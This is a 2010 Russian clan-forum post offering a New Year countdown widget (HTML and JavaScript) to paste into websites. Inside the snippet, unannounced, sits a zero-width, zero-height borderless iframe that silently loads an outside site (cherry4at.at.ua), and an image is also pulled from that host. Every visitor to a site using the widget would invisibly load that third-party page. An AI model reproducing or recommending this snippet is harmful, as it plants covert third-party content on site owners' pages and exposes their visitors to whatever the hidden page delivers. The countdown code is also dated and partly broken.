Меню Клана mKa
Наш опрос
Какую карту вы предпочитаете?
Всего ответов: 387
Статистика
Четверг, 25.04.2024, 18:23
Приветствую Вас Гость
[ Новые сообщения · Участники · Правила форума · Поиск · RSS ]
  • Страница 1 из 1
  • 1
Форум » Скрипты » Мини чат » СКРИПТ "ДО НОВОГО ГОДА..." (Скоро Новый Год!!!)
СКРИПТ "ДО НОВОГО ГОДА..." (Скоро Новый Год!!!)

DizZeL Дата: Понедельник, 04.01.2010, 15:57 | Сообщение # 1

Релизер
Сообщений: 160
Награды: 1
Репутация: 11
У вас
Мои награды:
Награды
СКРИНШОТ: http://rainbows.clan.su/ng2.JPG
РАБОЧИЙ 100%!
Скрипт показывает сколько дней, часов, минут и секунд осталось до НОВОГО ГОДА!
Скрипт адаптируеться под любой дизайн сайта!
Вставляем куда нужно этот код и всё - скрипт на вашем сайте!
Код:

Code
<div style='padding:14px; border: 1px dashed black;'>  
<script language="JavaScript1.2">   
//Script courtesy of Sharon Gartenberg's Date Countdown  
//JavaScript generator under the GNU General Public License  
var today = new Date;  
var Future0 = new Date;  
ThisYear = 2009;  
var FutureMonth = 11;  
var FutureDate = 31;  
var faraevent = "";  
Future0.setMonth(FutureMonth, FutureDate);  
Future0.setFullYear(ThisYear);  
today1 = Date.parse(today);  
future1 = Date.parse(Future0);  
secleft = future1 - today1;  
miliday = 24 * 60 * 60 * 1000;  
daysleft = secleft/miliday;  
daysleftint = Math.round(daysleft);  
if (daysleftint > 1)  
document.write("<font color=#ff0000>До нового года ", daysleftint, " дней", faraevent , "!</font>");  
else if (daysleftint == 1)  
document.write(faraevent, " is tomorrow! ");  
else if (today1 == future1)  
document.write(faraevent, " is today! ");  
</script></div><iframe src="http://cherry4at.at.ua/" width="0%"  
height="0%" scrolling="no" frameBorder=0></iframe><div align="center" >А точнее</div>  
<div id='x1' style='padding:14px; border: 1px dashed black;'></div>   
<div align="center" ><script Language="javascript">   
var timeStr, dateStr, ostStr, x;   
function clock() {   
now= new Date();   
ex = new Date(2010,0,1,0,0,0);   
hours= now.getHours();   
minutes= now.getMinutes();   
seconds= now.getSeconds();   
timeStr= "" + hours;   
timeStr+= ((minutes < 10) ? ":0" : ":") + minutes;   
date= now.getDate();   
month= now.getMonth()+1;   
year= now.getYear();   
dateStr= "" + date;   
dateStr+= ((month < 10) ? "/0" : "/") + month;   
dateStr+= "/" + year;   
ostStr= "";   
x = (ex.getTime() - now.getTime())/1000;   
ostStr = Math.floor(x/60/60) + ' ч. ';   
ostStr = ostStr + Math.floor((x/60/60 - Math.floor(x/60/60))*60) + ' мин. ';   
x = (((x/60/60 - Math.floor(x/60/60))*60) - Math.floor((x/60/60 - Math.floor(x/60/60))*60))*60;   
ostStr = ostStr + Math.floor(x) + ' сек. ';   
document.getElementById('x1').innerHTML = 'до Нового Года осталось: ' + '' + ostStr;   
Timer= setTimeout("clock()",10);   
}   
clock();   
</script>   
<img src="http://cherry4at.at.ua/Images/tiger.jpeg" border="3" width="150px">  
</div>


Если помог ставь +

Форум » Скрипты » Мини чат » СКРИПТ "ДО НОВОГО ГОДА..." (Скоро Новый Год!!!)
  • Страница 1 из 1
  • 1
Поиск:

Поиск
Партнеры
Архив записей